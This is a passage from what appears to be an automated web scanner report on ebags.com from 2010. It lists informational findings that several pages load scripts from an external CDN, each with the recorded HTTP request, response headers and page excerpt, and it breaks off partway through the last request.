<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.14. http://www.ebags.com/brand/quiksilver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/quiksilver

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/quiksilver HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59111


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.15. http://www.ebags.com/brand/timi-and-leslie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/timi-and-leslie

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/timi-and-leslie HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 67781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.16. http://www.ebags.com/brands/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brands/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.17. http://www.ebags.com/category/backpack-handbags/20036676  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/backpack-handbags/20036676

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/backpack-handbags/20036676 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:49 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:49 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 111929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.18. http://www.ebags.com/category/carry-on-luggage/20048891  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/carry-on-luggage/20048891

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/carry-on-luggage/20048891 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/department/bags-by-ebags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA;